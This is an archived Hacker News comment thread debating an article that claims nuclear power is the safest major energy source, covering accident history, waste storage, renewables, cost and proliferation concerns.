hacker news with inline top comments - 1 Aug 2017
Out of all major energy sources, nuclear is the safest ourworldindata.org
632 points by mpweiher  23 hours ago   588 comments top 88
payne92 22 hours ago 17 replies      
I believe the politicization of nuclear energy (the resulting lack of investment & innovation) will go down as one of the major blunders in human history.

We'd be in a far, far better situation with greenhouse gasses if we (as a human race) had continued to invest in nuclear energy. There would have been mishaps along the way, but at a much smaller scale than we're experiencing now with deaths from air pollution and looming risk of a warming planet.

We'd have much, much safer systems with modern reactor designs.

Animats 19 hours ago 9 replies      
It doesn't kill many people, because even when there's a disaster, there's time to evacuate. But you lose an entire city once in a while.

Major reactor disasters so far:

- SL-1. Steam explosion due to control rod lifted too far during maintenance. Small experimental reactor, built in the middle of nowhere (Idaho Reactor Test Station) for good reason. Inherently unsafe design.

- Three Mile Island. Meltdown due to cooling water failure due to instrument confusion. Contained by good containment vessel. No casualties. That's what should have happened at Fukushima.

- AVR pebble bed reactor. Pebble jam, radiation leak into ground. Contained, but too much of a mess to decommission.

- Chernobyl. Meltdown and fire due to operational error during testing. Totally inadequate containment. Entire region evacuated and contaminated for decades.

- Fukushima. Loss of coolant and meltdown. Containment vessel too small, reactor cores melted through in three reactors. Containment problem well known in advance; Peach Bottom PA has same design.

A big, strong containment vessel can keep a meltdown from becoming a major disaster, and has done so at least twice. Size matters; a large containment vessel faces lower pressures when all the water boils to steam. But a good worst-case containment vessel can cost as much as the rest of the plant.

Some of the recently-touted small reactor designs try to omit a containment vessel on the grounds that their design couldn't possibly melt down. That's probably not a good approach.

simias 22 hours ago 5 replies      
People are scared of nuclear energy for the same reason that they're scared of taking an airplane. Even though it's technically and statistically very safe, the perceived risk appears much greater.

In particular in both cases when something goes wrong it tends to go extremely wrong and you're completely helpless to stop it. In contrast getting in a car accident or slowly suffocating in coal power plant emissions seem manageable.

Personally I'm of the opinion that going all nuclear would be a mistake but on the other hand it's a great way to move away from coal and petrol while we're still figuring out how to scale renewable energies (and maybe fusion, but that's still a moonshot). It provides cheap, reliable and reasonably safe energy with very little CO2 emissions.

I'm more worried about global warming than Fukushima and I'd gladly trade even a dozen of Fukushima-type incidents in the next decades (highly unlikely) if it could stop global warming and its dire, hard-to-revert consequences.

In particular I genuinely do not understand why most ecologists seem to be staunchly anti-nuclear. I can understand asking for better funding in renewable R&D and planning for a transition but, at least in Europe, ecologists seem to favor dropping nuclear immediately, no matter the cost. For instance they applauded when Germany decided to completely stop producing nuclear energy, even if it meant more pollution in the short term. I find that hard to justify.

the_gastropod 22 hours ago 3 replies      
It appears that these figures take into account _just_ energy production. They don't seem to include the mining, enriching, construction of reactors, disposal of waste, decommissioning of reactors, etc. When mining low-grade ore (which isn't uncommon, and is becoming more common as high-grade ore becomes more scarce), nuclear plants are as inefficient as coal-fired plants [1]. Nuclear advocates tend to ignore the full system and focus on where nuclear shines: power production. The setup to get to that point is extremely costly.

[1] https://www.stormsmith.nl/i05.html

beat 20 hours ago 4 replies      
Of course, this is only comparing to fossil sources, not solar, wind, or other renewables (except biomass).

I don't think this is going to matter in the end, though. The best, most optimistic arguments the nuclear proponents can make would still take 20-30 years to build out enough to make a standard-deviation difference in greenhouse gasses.

Meanwhile, solar/wind are already hitting production costs that rival or beat nuclear, with lower setup costs and other barriers to entry. A wide variety of storage technologies are being actively developed (with real investor support) to cache cheap surplus production from solar/wind, making a mostly-solar grid viable. What will our solar/wind/storage grid look like in 30 years?

Nuclear as a stepping-stone to solar won't matter. It's faster and easier to just go straight to solar.

Tomte 21 hours ago 10 replies      
Before Chernobyl blew up, nuclear energy proponents promised us that nuclear energy was safe.

When Chernobyl blew up, it was obviously a stupid Soviet design, with stupid operating personnel. But now we've got new reactors, they are safe! Nothing could ever happen!

Then Fukushima blew up. That was obviously okay, because it was a tsunami in conjunction with a few other improbable events, and we obviously can't expect the nuclear industry to plan for that!

So we're now in the next round. Again, we're totally safe. We've got passive reactors. Really disruptive (g) tech!

I'm sorry, I've said it before and I'll say it again: proponents of nuclear energy have either been lying to us every single time over the last decades, or they can't really manage nuclear energy.

I don't care which one it is, and I don't care whether they believe nuclear energy is safe now. They have been playing with catastrophes of a magnitude we can't really comprehend, and the best they manage to do is "it could have been even worse" and "we promise this was the last time".

As far as I'm concerned, I'm all for making sure it was the last time.

cjsuk 22 hours ago 12 replies      
Apart from the waste.

We really don't know what to do about it, other than bury it and leave it for a few tens to hundreds of generations in the future to deal with, in the hope that they will know what to do.

So it's the safest option. But only for now. We might just be dooming our descendants to deal with the mess and they might be in a worse state than we are now.

chris_va 21 hours ago 3 replies      
There are a couple of things everyone should know when it comes to energy production:

1) Energy investment is primarily driven by cost, not perceived/actual safety. Safety regulations do affect cost, but not enough to significantly change investment (at least in the US, with the current conditions).

2) Base load power and intermittent (e.g. solar/wind) power are not the same thing, and are not comparable. The concept that "solar and wind will save us all" by themselves is fundamentally incorrect, and actually they make things worse in many ways.

Nuclear fear mongering has resulted in high levels of regulations around nuclear power, but even without that natural gas has an edge in $/kWh. There just hasn't been demand to build nuclear. On top of that, nuclear needs to run 24/7 to amortize high capital costs. With solar/wind, there is high variability in grid supply, so nuclear is significantly less cost effective, and is getting phased out in favor of low-capex plants (i.e. natural gas).

Barring some energy storage miracle, we'll eventually end up with ~35% renewables, 15% hydro, 50% natural gas in the US, with HVDC interconnect. No nuclear, no coal.

(source: I work in a Climate and Energy R&D group)

eloff 22 hours ago 4 replies      
My understanding, which is admittedly drawn from HN "napkin math", is that at current prices for solar and wind, nuclear is a non-starter. That trend is only intensifying. It seems to me that nuclear could have been a good option, but because we've neglected it for so long and squashed innovation with regulations (not saying the regulations weren't needed!), it is uncompetitive economically and will likely stay that way for the near future. Amazingly enough, even coal is uncompetitive in many parts of the world now too. The future is starting to turn green under the invisible hand of market economics.
lootsauce 22 hours ago 0 replies      
This report seems to discount the tail risks involved with potential future nuclear accidents. Lets ignore the very complicated question of risk tradeoffs vs other sources for the moment.

Nuclear power has extreme tail risk that is hard to quantify based on the few examples of it happening. For the three major events we can reference, how do we know we didn't simply get lucky?

With Fukushima, for example, "Japan's prime minister at the time of the 2011 earthquake and tsunami has revealed that the country came within a paper-thin margin of a nuclear disaster requiring the evacuation of 50 million people." [1]

Clearly the lack of deaths directly attributable to nuclear accidents does not accurately capture the risks.

So what exactly is the risk of a catastrophic event that has thankfully never happened but could? It's not clear, but rather than rolling dice with those risks, we can actually build better systems without those unquantifiable risks in the first place. That takes us to the tradeoff calculus.

Just in the realm of nuclear power there are far better approaches we should be investing in as opposed to traditional plants such as LFTR [2] which does not have proliferation, waste or meltdown risk.

Picking on coal is a little unfair at this time because coal is being supplanted by much cleaner natural gas purely on market forces and solar and wind are growing dramatically. Of course there are issues with these as well, scaling issues and their own kind of impacts but they do not harbor the same kind of unquantifiable massive tail risk of traditional nuclear.

[1] http://www.telegraph.co.uk/news/worldnews/asia/japan/1218411...

[2] https://en.wikipedia.org/wiki/Liquid_fluoride_thorium_reacto...

ThinkBeat 20 hours ago 1 reply      
The discussion I have seen so far on this thread go something like this:

1. Nuclear is really safe. The best.

2. Someone brings up an incident that actually happened.

3. Apologists excuse the incidents that happened because: a. It wasn't designed right. b. It was due to corruption. c. It was bad planning. Etc.

We live in the real world here. You don't prove nuclear is safe by excusing every accident and then using the disaster to prove how safe it is.

titzer 20 hours ago 2 replies      
The ironic thing is, and I'll probably be downvoted for even positing this, but Chernobyl was the best thing that ever happened to that local environment, at least when you look at how local wildlife has bounced back since it's been cordoned off as an exclusion zone.


inputcoffee 22 hours ago 3 replies      
Two important points:

1. What about wind and solar?

2. The death/unit energy misses out the fact that we spend a lot more to keep nuclear safe because we are worried about it. If we spent a fraction of the same amount on other energy, we might get similar safety results.

jesus92gz-spain 22 hours ago 3 replies      
How can nuclear (fission) energy be safer than wind/solar/hydro? New efficient solar cells should be enough, environmentally friendly, and safer than the alternatives, as long as their manufacturing is environmentally friendly as well. Also, everyone can set up their own solar plant at home; I almost did, but the price of the materials and the setup is too high for me.

I'd also like you to consider whether nuclear material is useful for something apart from generating energy. It may be useful for things we don't even know about right now, and in the future we may have consumed all the resources.

thinkcontext 21 hours ago 1 reply      
I find this line of reasoning a little misleading. Nuclear's safety record isn't entirely the correct measure; it's that the potential consequences are so extreme.

Consider Fukushima. In some ways Japan got lucky, it was entirely possible that an additional reactor on the site could have melted down and the holding pond could have breached. Because of this they were having to consider evacuating areas on the outskirts of Tokyo. Obviously, if that had happened we wouldn't even be having this conversation.

I don't claim that we have considered the risks appropriately, have a sensible nuclear policy, or are considering nuclear correctly wrt climate change. But to claim nuclear is the safest because direct deaths to date are lower is not the full story.

DrNuke 22 hours ago 0 replies      
YCombinator was investing in nuclear energy recently, so an update may be nice here, both at short and medium term level. Thanks in advance.
xelas 17 hours ago 0 replies      
Let's cut the crap, shall we? We can't solve the climate change problem, which has been acute for the last 20 years, yet somehow we believe that we can solve the storage of nuclear waste for the next 100,000. The Egyptian pyramids are ONLY 5,000 years old, and we are not 100% sure what is written in them.

How do you warn a generation 10,000 years from now that some particular site is dangerous/radioactive? How do we keep something safe for 100,000 years? Will our Earth look the same after 20,000 years, 50,000 years, 70,000 years? Will there be new volcanoes or shifts of the tectonic plates? An ice age? How do you keep such waste safe?

Even as of today, there is no final storage solution for spent nuclear fuel. There is one now being built in Finland, and it is just for the waste produced in Finland. BTW, there is a very nice movie about it: Into Eternity. You should watch it!

moomin 21 hours ago 1 reply      
I'm something of a fan of nuclear power, but there's no way it's safer than a solar panel array.

Ah, they didn't include renewables. Colour me surprised.

have_faith 23 hours ago 0 replies      
Is it the safest when projecting for increased usage? While also taking into account modern threat vectors to a nuclear plant? I have no idea, just thinking out loud.
JoshMnem 19 hours ago 0 replies      
Arguments for nuclear power tend to ignore a few things:

- They talk about ideal power plants, but not actual power plants. Are they assuming that when the world switches to nuclear, that every country will build these ideal types of plants and maintain them well?

- Pro-nuclear arguments don't talk about inevitable wars. When nuclear power plants are scattered across the world in countries that will eventually become unstable, the potential outcomes look different. We are living through an amazing time for peace in many countries, but it isn't a given that things will remain peaceful like this.

- Radiation has a cultural effect as well, and those plants and storage facilities make likely targets, since radiation disasters tend to cause people to panic.

- After a plant or its fuel stops producing power, there is less incentive to take care of the waste and cleanup.

I'm not entirely against nuclear power, but I think that it's a more complicated issue than most nuclear proponents claim.

Energy efficiency and use reduction are two other areas to consider. If it's possible to change behavior and opinions around nuclear energy then it should be possible to change behavior and opinions about efficiency.

chicob 21 hours ago 0 replies      
Fission power's bad rep is bad for fusion power, the latter being far safer in every respect.

Anyway, although air pollution is a serious issue, to this day no city has had to be permanently evacuated because of it.

Regretfully, nuclear energy has an aura of doom, and investment in nuclear power plants wrongfully reeks of hubris.

Even if it isn't a renewable source, fission power is one of our best allies in tackling CO2 emissions. At least it may buy us some time before fusion power and the dissemination of renewables.

xg15 22 hours ago 11 replies      
Can anyone explain to me why "deaths/tWh" is even a meaningful measure?

Of course nuclear energy has one of the highest Wh outputs, no-one is disputing that. However, what does that have to do with the risk of use? That seems like a measure very skewed to make arguments in favour of nuclear power.

I might as well argue that car drivers are safer than pedestrians because the average deaths/horse power is vastly lower.

Also, why did they leave out hydro and wind power in those "deaths per x" charts?
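For what it's worth, deaths/tWh is just a normalization. Here is a minimal sketch of how the metric behaves and what it hides; every number below is an invented placeholder for illustration, not a figure from the article:

```python
# Napkin-math sketch of the deaths-per-TWh normalization being debated.
# The death counts and energy totals are made up; only the shape of the
# calculation matters.

def deaths_per_twh(total_deaths, total_twh):
    """Deaths attributed to a source, normalized by energy delivered."""
    return total_deaths / total_twh

# Hypothetical source -> (attributed deaths, TWh generated) over some period.
sources = {
    "coal":    (1_000_000, 40_000),   # many small, continuous harms
    "nuclear": (5_000,     25_000),   # few, large, rare events
}

for name, (deaths, twh) in sources.items():
    print(f"{name:8s} {deaths_per_twh(deaths, twh):8.2f} deaths/TWh")
```

The metric answers "harm per unit of benefit delivered", which is arguably fairer than deaths per plant or deaths per year. What it does not capture is tail risk: a rare event with huge consequences barely moves a historical average until it actually happens.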

epistasis 20 hours ago 1 reply      
Before we even get to the safety, and the disposal of the nuclear waste, we have huge difficulties with the basic economics and construction of nuclear in the US.

The two plants under construction, Summer and Vogtle, have been plagued by construction difficulties and cost overruns. The Summer plant was just finally cancelled today. It seems that the Vogtle plant is going to follow the same route.

The management competence and institutional knowledge needed to build these large, insanely expensive projects seems to have disappeared. The time for nuclear in the US is done. Other options are cheaper, faster, and more responsive. And that's ignoring the political aspect of it all.


frabbit 19 hours ago 0 replies      
As the article makes clear, this is another technology that might be useful in the future, but is currently unusable thanks to the problem of the waste generated from it. There are no safe options for storing nuclear waste right now.

It really is time that we start looking at cutting back mindless generation and consumption of energy and that mostly means a big shift in lifestyle for North American and European consumers.

Either that or else you can all explain to your children and grandchildren (whom you love very much and would do anything for etc.) that you decided that living an hour's drive or more from work and commuting in every day while eating fresh dragonfruit and shrimp flown from the other side of the world was just fine.

Reduce. Re-use. Recycle. Time to start actually working on the first of those.

bmcusick 21 hours ago 4 replies      
Ctrl+F "Solar", "Wind". No matches found.

That's weird, huh? I'm all for a rational assessment of risk, but shouldn't they be on the list?

Actually, I've seen such comparisons, and solar and wind do pretty well. They don't kill anyone from air pollution and global warming, but manufacturing and maintenance isn't risk-free. When you install things on roofs, sometimes people fall off.

Most solar installations these days, however, are utility-scale deployments in empty fields. It's pretty low risk, plus it gets the same pollution and AGW benefits that nuclear benefits from.

As an aside, I wonder if anyone has done the math on storing high-level nuclear waste on the Moon, now that a fully reusable SpaceX Falcon Heavy is almost here. That might be cheaper than the financial and political costs of places like Yucca Mountain.

vbuwivbiu 21 hours ago 1 reply      
I'm against centralized power generation of any kind. Make a household fusion generator that's safe and maybe I'll consider it, but until then I'm for solar because it can be deployed in a decentralized network (with batteries), and it's clean.

That leaves the problem of the mining and manufacture, which is still centralized. This problem can be solved with GM organisms. We engineer fungi and bacteria to grow on roofs and generate electricity. They'd use CO2 in the growing process too. We can grow batteries in a similar way. Bacteria, yeast and viruses can do anything. They're the ultimate nanotech, we just need to learn how to program them.

pbreit 22 hours ago 0 replies      
I have only skimmed, but I didn't see wind, solar or hydro?
quantdev 21 hours ago 0 replies      
Trying to understand risk by looking at historic data alone is wrong when you're talking about catastrophic ruin and uncertain tiny probabilities. Substitute "weapon" into the headline claim to see what I mean:

"Contrary to popular belief, nuclear weapons are the safest modern weapon"

Arguments that nuclear power is safe need to prove that while assuming the worst-case scenario, since the probability of such a scenario is a priori unknown, despite what much of this comment section seems to be claiming.

Solar is knowably much safer because it is much easier to reason about.

meri_dian 21 hours ago 0 replies      
China is charging ahead with nuclear in order to replace their outdated coal dependent energy infrastructure.


As they develop and improve their reactor technology their plan is to export safer, more efficient fission reactors to the rest of the world.

maho 19 hours ago 0 replies      
While I mostly agree with the article's risk assessments, it unfortunately leaves out one major risk factor: Nuclear proliferation. If more and more countries have access to nuclear power plants, then they also have the possibility to divert significant quantities (SQ) [1] of fissile materials towards nuclear weapons.

I cannot find the source right now, but a talk given by non-proliferation experts outlined how accounting for fissile material in a reactor is about 99% accurate. But even 1% of nuclear fuel, on a nuclear-powered-world scale, is equivalent to hundreds of SQs per year, assuming current-generation and next-generation reactor technologies.

A nuclear conflict, even a regional one (only a few dozen detonations), could potentially have dire, world-wide consequences. The article should have at least touched on those.

[1]: http://nsspi.tamu.edu/nssep/reference/technical-safeguards-t...
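As a sanity check on that arithmetic, here is a rough sketch with assumed numbers. The 8 kg significant quantity for plutonium is the commonly cited IAEA figure; the fuel throughput and plutonium fraction are ballpark assumptions of mine, not figures from the linked talk:

```python
# Rough material-accounting arithmetic for the parent's claim.

SQ_PU_KG = 8.0                   # IAEA significant quantity for plutonium, kg

spent_fuel_t_per_year = 10_000   # assumed global spent-fuel discharge, tonnes
pu_fraction           = 0.01     # typical ~1% plutonium in LWR spent fuel
accounting_gap        = 0.01     # the talk's ~1% accounting uncertainty

# Plutonium that could go missing inside the accounting error bars, in kg.
unaccounted_pu_kg = spent_fuel_t_per_year * 1000 * pu_fraction * accounting_gap

print(f"~{unaccounted_pu_kg / SQ_PU_KG:.0f} SQ/year inside the error bars")
```

With these placeholders the gap is on the order of a hundred SQs per year at today's scale, so a world several times more nuclear-powered would indeed put "hundreds of SQs" inside the error bars, consistent with the claim above.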

egypturnash 20 hours ago 1 reply      
[misleading headline]

> Here we limit our comparison to the dominant energy sources: brown coal, coal, oil, gas, biomass and nuclear energy; in 2014 these sources accounted for about 96% of global energy production. While the negative health impacts of modern renewable energy technologies are so far thought to be small, they have been less fully explored.

tehabe 20 hours ago 0 replies      
One thing is simply missing from the piece. You can't really distinguish between the civil use of nuclear power and the military use.

Maybe there is some reactor design that can fix this, but the reactors currently being built are not those designs. Also, they are built for 60+ years. A lot can happen in 60 years.

Discussing an energy source just by pointing to future developments is not the answer. The EPR reactors in Finland and France are several times over budget and took much longer than planned to build. In that time you could have built wind turbines and solar cells all over the country with an equivalent or higher power output. And according to the current statistics, every added kilowatt would have been cheaper than the last one.

Also, you might now say that solar and wind are not always available. But at the same time you think that all problems with nuclear can be overcome, yet not the storage of electricity?

Taylor_OD 20 hours ago 0 replies      
Most people who I've talked to about their fears over nuclear energy say they wouldn't want to be in the blast zone in case of a meltdown, or near a potential terrorist target. Then I pull up the map of existing nuclear plants and, more often than not, they already live close to one. I've found it's a fear thing for most people.
neurotech1 19 hours ago 0 replies      
Nuclear energy is only as safe as the people operating it. Admiral Rickover demanded a high personal standard from reactor personnel, and there were ZERO reactor accidents [0] because of those standards.

IMO natural gas/biogas powered turbine generators are a better option to augment wind and solar power generation. The GE LM6000 [1] gas turbine (based on the 747's GE CF6 engine) can produce 40MW+ of electricity. They could even recycle a surplus CF6 engine to reduce the manufacturing resources required.

[0] https://en.wikipedia.org/wiki/Hyman_G._Rickover#Safety_recor...

[1] https://en.wikipedia.org/wiki/General_Electric_LM6000

meri_dian 18 hours ago 0 replies      
Flying used to be much more dangerous than it is now. But we improved the technology, and now it's safe enough that most don't think twice before getting on a plane.

Discussions of nuclear power somehow ignore the fact that, like any other technology, current reactor designs are not the final iteration. They can be improved upon.

Look at the Chinese pebble-bed reactor: https://www.technologyreview.com/s/600757/china-could-have-a...

If everyone aside from the Chinese ignores nuclear power, then the Chinese may be the ones making a fortune selling their advanced reactor designs to everyone else.

ricw 21 hours ago 2 replies      
The quoted statistics are interesting, but irrelevant when it comes to the actual use of nuclear. Furthermore, why are solar and wind energy missing from these stats? They account for 90% of new power in Europe in 2016 [1], and I'd assume similar for the major world economies. I'd like to know who funded this study. It screams of nuclear industry backing...

For anyone still in disbelief that nuclear is being made obsolete: why has not a single (!) private insurer been willing to fully insure a nuclear facility without government backing? The reason is simple: the risk is too high, even for insurance companies worth billions.

TLDR: nuclear has, as yet, not worked using private financing.

[1] https://www.theguardian.com/environment/2017/feb/09/new-ener...

SubiculumCode 22 hours ago 0 replies      
While the threats from coal and gas are distributed evenly through time (a near-constant rate of pollutants), the threats from nuclear energy are sporadic (i.e. meltdown, terror) and are thus harder to model and assess. I also agree with others that wind and solar are being discounted unfairly despite their growth.
a_imho 22 hours ago 1 reply      
I wonder how much nuclear suffers from bad PR. Clearly statistics are not really effective at changing opinions. But what would happen if a popular Elon Musk/Steve Jobs type of public figure got into the lobbying game with a nuclear company? Could that swing perception either way?
mncolinlee 19 hours ago 1 reply      
Not true. In the short run, solar is the safest. A massive spill of solar energy is just called a nice day. In the long run, it's the most dangerous. The sun may eventually consume the Earth and much later, go nova.
1337biz 22 hours ago 0 replies      
Logical arguments do not apply in that scenario. Other energy forms might kill people a slow, invisible death. But when a nuclear reactor melts down the pictures of death and drama will go around the world.
komali2 21 hours ago 0 replies      
Now that is an introduction!

>The production of energy can be attributed to both mortality (deaths) and morbidity (severe illness) cases as a consequence of each stage of the energy production process:

A lot of people here may know what mortality and morbidity mean straight off, but I want to share this article as much as possible, and it does a great job reaching out to laymen. I also like how it starts right off with "more energy is good, here's a link demonstrating why, let's move on."

internalfx 22 hours ago 1 reply      
Can anyone comment on if the LFTR is legit?


secult 6 hours ago 0 replies      
Popular belief in any difficult topic is not a good indicator of anything.
_Codemonkeyism 22 hours ago 0 replies      
Most relevant sentence from the article:

"Here we limit our comparison to the dominant energy sources: brown coal, coal, oil, gas, biomass and nuclear energy;"

marcoperaza 22 hours ago 0 replies      
We don't have to choose between energy abundance and good stewardship of the environment. Why do green activists and a majority of Western governments want us to? Attempts to force Western countries to cut emissions, without a corresponding transition to nuclear power, are unacceptable and represent a wealth transfer from rich countries to poor countries.
shams93 22 hours ago 0 replies      
Wind works so well in places like Santa Monica that the utilities were able to make it illegal to use wind power for your home. Fortunately they were not able to do the same to solar. We have homeowners in California generating more energy than they use with their home solar panels; my parents, for example, generate more than they use even at the height of summer.
prewett 18 hours ago 0 replies      
This article severely underestimates the number of deaths by nuclear power by not considering the deaths caused by leakage of radioactive materials over the course of the next 10,000 years. In fact, there really isn't any way to know that number for another 500 years at least.
qweqweqweqw 20 hours ago 0 replies      
I've come to the conclusion that nuclear energy is a good thing when done correctly. Sadly, we seem to be plagued by 60-year-old power plants with severe safety problems still running, because the power companies don't care about safety; they just want to run them as long as possible until they fail.
kumarski 20 hours ago 0 replies      
I've been writing about, thinking about, and exploring lithospheric energy extraction for the better part of 20 years.

I studied operations research during college in the hopes of working on India's nuclear supply chain.

The west choked us out of Uranium and Plutonium, similar to how the British choked us out of Rice during the Bengal Famine of 1943.

More than anything, the brown/black people of the world need the west to give in to our demands for the approval of our uranium desires to help us get to progress driven escape velocity Nitrogen + Steel economies.

anotherbrownguy 22 hours ago 1 reply      
Isn't nuclear hysteria created mostly by American CleanTech industry?

Solar is not a reliable source to begin with so you can't use it to power anything critical. It has to be combined with something like nuclear or fossil fuels to have reliable power. But if we go nuclear, we will have 1000s of years worth of power. So, where exactly does Solar fit in?

tabtab 21 hours ago 1 reply      
It's going to be politicized no matter what. Stop spanking humans for having human nature and lecturing them about being more rational. Politicians have to consider perception or they get voted out. It's just a technology that freaks people out on an emotional level and you can't stop that.
pps43 21 hours ago 0 replies      
The comparison is incomplete without taking BDBA (beyond-design-basis accidents) into consideration. The probability of an accident worse than Chernobyl is low, but not zero. Multiply it by the economic loss from a large, densely populated area becoming uninhabitable, and it can easily flip the conclusion.
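The probability-times-consequence arithmetic behind this point can be sketched with placeholder numbers; every figure below is invented purely for illustration, not an estimate of any real plant:

```python
# Toy expected-loss comparison: a tiny probability multiplied by an enormous
# consequence can dominate steady, certain costs. All numbers are invented.

def expected_annual_loss(p_event_per_year, loss_if_event):
    """Expected loss per year: probability of the event times its cost."""
    return p_event_per_year * loss_if_event

routine = expected_annual_loss(1.0, 2e9)     # steady, certain annual costs
bdba    = expected_annual_loss(1e-4, 1e14)   # rare beyond-design-basis accident

print(f"routine operation: ${routine:,.0f}/yr expected")
print(f"BDBA tail risk:    ${bdba:,.0f}/yr expected")
```

With these placeholders the tail term is five times larger, even though the event is expected less than once in a thousand years of operation; and since the probability itself is highly uncertain, the comparison can flip either way.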
agumonkey 20 hours ago 0 replies      
A French engineer, Jean-Marc Jancovici, has been making this claim for a decade, in many talks and documents. I'm only 80% a fan of his thinking, because he doesn't account much for human change and new technological reconfiguration.
jonshariat 20 hours ago 0 replies      
I'm not saying this is the main factor for not choosing nuclear, but this should be considered: the one difference with nuclear is that when a system fails, you can't use that area of land for a few thousand years.
skndr 22 hours ago 0 replies      
With a potential reduction in the Department of Energy's budget, this might not hold. There may not be enough funding to properly dispose of the waste. Not to mention that some of the effects of past storage aren't well-catalogued [0]:

"Three years ago the D.O.E. sent the local tribes a letter to say they shouldn't eat the fish they caught in the river more than once a week."


Hanford turns out to be a good example of an American impulse: to avoid knowledge that conflicts with whatever your narrow, short-term interests might be. What we know about Hanford we know mainly from whistle-blowers who worked inside the nuclear facility -- and who have been ostracized by their community for threatening the industry in a one-industry town. ("Resistance to understanding a threat grows with proximity," writes Brown.) One hundred and forty-nine of the tanks in the Hanford farms are made of a single shell of a steel ill-designed to contain highly acidic nuclear waste. Sixty-seven of them have failed in some way and allowed waste or vapors to seep out. Each tank contains its own particular stew of chemicals, so no two tanks can be managed in the same way. At the top of many tanks accumulates a hydrogen gas, which, if not vented, might cause the tank to explode. "There are Fukushima-level events that could happen at any moment," says Carpenter. "You'd be releasing millions of curies of strontium 90 and cesium. And once it's out there it doesn't go away -- not for hundreds and hundreds of years."

The people who created the plutonium for the first bombs, in the 1940s and early 1950s, were understandably in too much of a rush to worry about what might happen afterward. They simply dumped 120 million gallons of high-level waste, and another 444 billion gallons of contaminated liquid, into the ground. They piled uranium (half-life: 4.5 billion years) into unlined pits near the Columbia River. They dug 42 miles of trenches to dispose of solid radioactive waste -- and left no good records of what's in the trenches. In early May of this year a tunnel at Hanford, built in the 1950s to bury low-level waste, collapsed. In response, the workers dumped truckloads of dirt into the hole. That dirt is now classified as low-level radioactive waste and needs to be disposed of. "The reason the Hanford cleanup sucks -- in a word -- is shortcuts," said Carpenter. "Too many goddamn shortcuts."

[0] http://www.vanityfair.com/news/2017/07/department-of-energy-...

xyproto 19 hours ago 0 replies      
If only there was no connection to nuclear weapons, which are... unsafe.
lasermike026 21 hours ago 0 replies      
The question is how can we do nuclear right? From outward appearances it looks like have been doing it wrong, Three Mile Island, Chernobyl, and Fukushima for example. French nuclear systems appear to get it more right.
unabst 22 hours ago 1 reply      
The public's nuclear acceptance is not about day to day death toll. It's about broken promises and Armageddon.

Looking at the chart, I'd take gas over nuclear in a heartbeat, thinking of what nuclear has done to Japan. Nuclear can both power and destroy a country. Gas and other options cannot. Neither can solar or wind, which are not even in that chart.

Say we have a new technology that is safer than nuclear, but had a one in a million chance to destroy Earth. It would be safest on paper, for however long paper and researchers still existed.

"But Fukushima was a horrible place for a nuclear power plant and it was run by incompetent people," you say. But that's exactly the point. If we make a list of all the plants in the world and the safety measures they undermined and their staffing situation, how many would be stellar? How many would even admit anything?

jwildeboer 17 hours ago 0 replies      
I stopped reading after "Here we limit our comparison to the dominant energy sources -- brown coal, coal, oil, gas, biomass and nuclear energy"
lordlimecat 21 hours ago 0 replies      
Not shown in the graph: Hydroelectric, which conjures up images of beautiful dams, rather than the hundreds of thousands of people who die at once when it fails.
danieledavi 20 hours ago 0 replies      
We should try to use renewable resources as much as possible and save precious, expensive, rare elements to be used only for scientific research and space missions (propulsion and power plants). We have many alternatives on Earth, but we don't have energy alternatives on other planets and in outer space. We are just wasting the opportunity to go far.
PeterStuer 22 hours ago 0 replies      
There is one huge problem with nuclear energy. Humanity has time and time again proven they can not handle that kind of responsibility.
VT_Drew 20 hours ago 0 replies      
Can we just stop with this nonsense? If you have a byproduct that has to be buried in special containers in the desert, on land that can't be used afterward, and there are people actually trying to come up with danger symbols that could span every language and culture in case a meteor hits the earth and civilization slowly rebuilds and then finds the site, then it isn't "safe" by any stretch of the imagination.
deepnotderp 20 hours ago 0 replies      
This assessment ignores the ecological cost of mining and waste disposal, both highly nontrivial concerns.
kaikai 22 hours ago 0 replies      
No one seems to think disposing of nuclear waste is a problem until someone tries to dispose of it in their backyard.
oregontechninja 20 hours ago 0 replies      
Check out NuScale if you want to see what a modern nuclear company is trying to achieve.
jdeibele 22 hours ago 0 replies      
When they use .00 on all the figures, it calls into question everything else about the article.
kzrdude 22 hours ago 1 reply      
At the same time, it wasn't predicted that solar power would be this viable, was it?
MR4D 19 hours ago 1 reply      
This is laughable. It's almost like saying that nuclear weapons are safer than sticks and stones because nuclear weapons have killed fewer people. Never mind that nuclear weapons have the possibility of making our species extinct.

Likewise for nuclear power accidents.

FussyZeus 23 hours ago 6 replies      
The brain is not designed to understand statistics. Nuclear accidents are theatrical and fun, and therefore get a lot of play in the media when they happen. Look no further than the media circus surrounding Fukushima to confirm.

Everybody is scared to death of Sharks, yet sharks killed only 1 person in the US last year. Cows killed 20, 75% of which were deliberate attacks, but almost no one is afraid of a Cow.

Meanwhile 17,775 people died in traffic accidents, yet people jump in cars like it's routine. You're literally about 17,000 times more likely to die in your own car than by a shark, but again, brains don't understand that.

egl2016 21 hours ago 0 replies      
tl;dr: if we assume deleterious effects from CO2-driven global warming and discount effects from long-term storage of high-level nuclear waste, nuclear is safer.
jlebrech 22 hours ago 0 replies      
anorphirith 22 hours ago 6 replies      
The only problem is where to get the uranium. I believe Russia gets it from Kazakhstan, and France from Niger. Does the US buy it from Kazakhstan as well?
dredmorbius 16 hours ago 0 replies      
The maps below correspond roughly to Zhumadian City, Henan Province, China. The region spans about 100 km east-west. It is presently home to over 7 million people.[0]


In 1975, it was the site -- or perhaps more accurately, the region -- of the worst power plant disaster in all history: the Banqiao dam failure. News of this only fully emerged more than two decades later.[1] You can spot the reservoir itself at the far left of the images, at mid-height.

In the disaster, a confluence of events led to the deaths of approximately 171,000 people, with 11 million displaced. There's considerable uncertainty in those numbers.

The causes were multiple: siting, improper engineering, unheeded warnings, a (literal) perfect storm (tropical typhoon striking a cold front and lingering over the region for a full day, dropping over 1 meter of rain), improper emergency plans, failed communications, situational confusion, nightfall, and a hopelessly inadequate response and recovery. Of the deaths, "only" -- a term used advisedly -- 25,000 or so were due to direct flooding. The remaining 150,000 or so succumbed to starvation or disease in the weeks following the events.

And yet: the book has been closed. The cities in the floodplain are rebuilt. The dam itself has been rebuilt. Over 7 million people live in Zhumadian City, 95 million in Henan Province in total.

There is no disaster exclusion zone.

There is no disaster exclusion zone which will persist for the next three centuries.

There is no molten reactor core.

There is no corium.

There is no radioactive waste which will persist for 10,000 to 1 million years.

The book is closed.

Proponents of nuclear power assume that we can assess risks with tails not of the decade or so of Banqiao, but of 100, 1,000, 1 million years. Utterly outside the scope of any human institutions, or of the human species itself.

Our models of risks and of costs fail us.

